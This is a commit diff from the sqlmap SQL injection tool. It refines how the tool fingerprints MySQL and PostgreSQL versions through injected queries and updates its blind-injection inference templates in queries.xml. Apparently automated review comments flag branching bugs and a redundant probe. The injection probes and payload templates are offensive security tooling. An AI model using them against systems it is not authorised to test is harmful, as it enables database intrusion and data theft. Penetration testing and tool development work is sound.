

Commit 7ad9639

Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3
1 parent a19229c commit 7ad9639

4 files changed

Lines changed: 71 additions & 24 deletions


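--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -11,6 +11,8 @@ sqlmap (0.6.2-1) stable; urgency=low
 not 'public' schema or a system database;
 * Minor improvement to be able to dump entries on MySQL < 5.0 when
 database name, table name and column(s) are provided;
+* Updated the database management system fingerprint checks to correctly
+identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
 * Minor code restyling.
 
 -- Bernardo Damele A. G. <[email protected]> Sat, 1 Nov 2008 10:00:00 +0100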

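--- a/plugins/dbms/mysql.py
+++ b/plugins/dbms/mysql.py
@@ -132,15 +132,15 @@ def __commentCheck(self):
 
 return None
 
-# MySQL valid versions updated at 07/2008
+# MySQL valid versions updated at 10/2008
 versions = (
 (32200, 32233), # MySQL 3.22
 (32300, 32354), # MySQL 3.23
 (40000, 40024), # MySQL 4.0
 (40100, 40122), # MySQL 4.1
-(50000, 50067), # MySQL 5.0
-(50100, 50126), # MySQL 5.1
-(60000, 60006), # MySQL 6.0
+(50000, 50072), # MySQL 5.0
+(50100, 50129), # MySQL 5.1
+(60000, 60008), # MySQL 6.0
 )
 
 for element in versions:
@@ -202,6 +202,14 @@ def getFingerprint(self):
 
 
 def checkDbms(self):
+"""
+References for fingerprint:
+
+* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
+* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
+* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html
+"""
+
 if conf.dbms in MYSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
 setDbms("MySQL %s" % kb.dbmsVersion[0])
 
@@ -229,38 +237,66 @@ def checkDbms(self):
 
 return False
 
-query = "SELECT %s " % randInt
-query += "FROM information_schema.TABLES "
-query += "LIMIT 0, 1"
-
-if inject.getValue(query) == randInt:
+# Determine if it is MySQL >= 5.0.0
+if inject.getValue("SELECT %s FROM information_schema.TABLES LIMIT 0, 1" % randInt) == randInt:
 setDbms("MySQL 5")
 self.has_information_schema = True
 
 if not conf.extensiveFp:
 kb.dbmsVersion = [">= 5.0.0"]
 return True
 
-self.currentDb = inject.getValue("DATABASE()")
-if self.currentDb == inject.getValue("SCHEMA()"):
-kb.dbmsVersion = [">= 5.0.2", "< 5.1"]
-
-query = "SELECT %s " % randInt
-query += "FROM information_schema.PARTITIONS "
-query += "LIMIT 0, 1"
-
-if inject.getValue(query) == randInt:
-kb.dbmsVersion = [">= 5.1"]
+# Check if it is MySQL >= 6.0.3
+if inject.getValue("SELECT %s FROM information_schema.PARAMETERS LIMIT 0, 1" % randInt) == randInt:
+if inject.getValue("SELECT %s FROM information_schema.PROFILING LIMIT 0, 1" % randInt) == randInt:
+kb.dbmsVersion = [">= 6.0.5"]
+else:
+kb.dbmsVersion = [">= 6.0.3", "< 6.0.5"]
+
+# Or if it MySQL >= 5.1.2 and < 6.0.3
+elif inject.getValue("MID(@@plugin_dir, 1, 1)"):
+if inject.getValue("SELECT %s FROM information_schema.PROFILING LIMIT 0, 1" % randInt) == randInt:
+kb.dbmsVersion = [">= 5.1.28", "< 6.0.3"]
+elif inject.getValue("MID(@@innodb_stats_on_metadata, 1, 1)"):
+kb.dbmsVersion = [">= 5.1.17", "< 5.1.28"]
+elif inject.getValue("SELECT %s FROM information_schema.REFERENTIAL_CONSTRAINTS LIMIT 0, 1" % randInt) == randInt:
+kb.dbmsVersion = [">= 5.1.10", "< 5.1.17"]
+elif inject.getValue("SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1" % randInt) == randInt:
+kb.dbmsVersion = [">= 5.1.7", "< 5.1.10"]
+elif inject.getValue("SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1" % randInt) == randInt:
+kb.dbmsVersion = ["= 5.1.6"]
+elif inject.getValue("SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1" % randInt) == randInt:
+kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"]
+elif inject.getValue("MID(@@table_open_cache, 1, 1)"):
+kb.dbmsVersion = [">= 5.1.3", "< 5.1.5"]
+else:
+kb.dbmsVersion = ["= 5.1.2"]
+
+# Or if it is MySQL >= 5.0.0 and < 5.1.2
+elif inject.getValue("MID(@@hostname, 1, 1)"):
+kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"]
+# NOTE: MySQL 5.0.12 introduced SLEEP() function
+# References:
+# * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-12.html
+# * http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_sleep
+elif inject.getValue("SELECT 1 FROM DUAL") == "1":
+kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"]
+elif inject.getValue("DATABASE() LIKE SCHEMA()"):
+kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"]
 else:
-kb.dbmsVersion = ["= 5.0.0 or 5.0.1"]
+kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"]
+
+# Otherwise assume it is MySQL < 5.0.0
 else:
 setDbms("MySQL 4")
 kb.dbmsVersion = ["< 5.0.0"]
 
 if not conf.extensiveFp:
 return True
 
+# Check which version of MySQL , 5.0.0 it is
 coercibility = inject.getValue("COERCIBILITY(USER())")
+
 if coercibility == "3":
 kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"]
 elif coercibility == "2":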
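Review bot: The probes at new lines 257, 260, 270, 276 and 284 branch on the bare truthiness of `inject.getValue(...)`, while the neighbouring probes compare the result to `randInt` or `"1"`; if getValue() hands back a non-empty marker for a NULL or failed query (`DATABASE() LIKE SCHEMA()` yields NULL when no default database is selected), Python truthiness takes the branch and the version window is wrong — I can't see getValue()'s contract on this page, so confirm how it renders NULL/empty and, where the expression yields 0/1, compare explicitly, e.g. `elif inject.getValue("DATABASE() LIKE SCHEMA()") == "1":`. The comment block at new lines 278-281 explains that SLEEP() arrived in 5.0.12, but the probe directly beneath it is `SELECT 1 FROM DUAL` bounded at `>= 5.0.11`, so either the comment is stale or the probe was swapped without updating it; say which feature the DUAL probe actually keys on. New line 297 reads `# Check which version of MySQL , 5.0.0 it is` and should read `# Check which version of MySQL < 5.0.0 it is`. checkDbms continues past the end of the hunk.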

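--- a/plugins/dbms/postgresql.py
+++ b/plugins/dbms/postgresql.py
@@ -137,6 +137,10 @@ def getFingerprint(self):
 
 
 def checkDbms(self):
+"""
+Reference for fingerprint: http://www.postgresql.org/docs/8.3/interactive/release-8-3.html
+"""
+
 if conf.dbms in PGSQL_ALIASES:
 setDbms("PostgreSQL")
 
@@ -166,8 +170,13 @@ def checkDbms(self):
 if not conf.extensiveFp:
 return True
 
-if inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)") == "2":
-kb.dbmsVersion = [">= 8.2.0"]
+transTimeCasted = inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)") in ( "1", "2" )
+transTime = inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)") in ( "1", "2" )
+
+if transTimeCasted and not transTime:
+kb.dbmsVersion = [">= 8.3.0"]
+elif transTime:
+kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"]
 elif inject.getValue("GREATEST(5, 9, 1)") == "9":
 kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"]
 elif inject.getValue("WIDTH_BUCKET(5.35, 0.024, 10.06, 5)") == "3":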
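Review bot: Both TRANSACTION_TIMESTAMP() probes at new lines 173-174 are evaluated unconditionally on every extensive fingerprint, although the uncast one only carries information once the cast one has succeeded, so one of the two requests is always wasted. Nesting the uncast probe under the cast one removes that extra round-trip and makes the condition for 8.3 — cast form works, implicit timestamp-to-text cast gone — explicit in the code; the only input that would be classified differently is a server where the uncast form succeeds while `::text` fails, which I would not expect from any release but cannot verify from this page. The new docstring at new lines 140-142 gives only the reference URL; it would help to add that the method sets `kb.dbmsVersion` to a version window and returns `True` once the backend is identified as PostgreSQL. checkDbms continues past the end of the hunk.
```python
if inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)") in ( "1", "2" ):
    # 8.3 removed the implicit cast of a timestamp to text, so the
    # uncast form only succeeds on 8.2.x
    if inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)") in ( "1", "2" ):
        kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"]
    else:
        kb.dbmsVersion = [">= 8.3.0"]
# … unchanged: GREATEST / WIDTH_BUCKET probes …
```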

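--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -110,8 +110,8 @@
 <limitstring query=" OFFSET "/>
 <order query="ORDER BY %s ASC"/>
 <count query="COUNT(%s)"/>
-<substring query="SUBSTR((%s), %d, %d)"/>
-<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
+<substring query="SUBSTR((%s)::text, %d, %d)"/>
+<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
 <banner query="VERSION()"/>
 <current_user query="CURRENT_USER"/>
 <current_db query="CURRENT_DATABASE()"/>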
